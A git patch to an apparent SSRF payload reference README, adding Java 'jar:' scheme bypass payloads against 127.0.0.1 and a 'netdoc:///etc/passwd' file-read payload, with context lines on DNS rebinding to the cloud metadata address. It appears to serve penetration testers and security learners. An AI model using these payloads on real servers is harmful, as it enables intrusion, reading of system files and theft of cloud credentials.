From 08bc3acb053846aacf837965c2b3574ff9c97752 Mon Sep 17 00:00:00 2001
From: security-is-myth <secismyth@gmail.com>
Date: Sat, 7 Nov 2020 22:03:02 +0530
Subject: [PATCH] update SSRF/README.md with java payloads

---
 Server Side Request Forgery/README.md | 13 +++++++++++--
 1 file changed, 11 insertions(+), 2 deletions(-)

diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md
index f96314c..c7613ab 100644
--- a/Server Side Request Forgery/README.md	
+++ b/Server Side Request Forgery/README.md	
@@ -247,6 +247,15 @@ For example to rotate between 1.2.3.4 and 169.254-169.254, use the following dom
 make-1.2.3.4-rebind-169.254-169.254-rr.1u.ms
 ```
 
+### Bypassing using jar protocol (java only)
+
+```powershell
+jar:scheme://domain/path!/ 
+jar:http://127.0.0.1!/
+jar:https://127.0.0.1!/
+jar:ftp://127.0.0.1!/
+```
+
 ## SSRF exploitation via URL Scheme
 
 ### File 
@@ -374,8 +383,8 @@ Content of evil.com/redirect.php:
 Wrapper for Java when your payloads struggle with "\n" and "\r" characters.
 
 ```powershell
-ssrf.php?url=gopher://127.0.0.1:4242/DATA
-```
+ssrf.php?url=netdoc:///etc/passwd
+``` 
 
 ## SSRF exploiting WSGI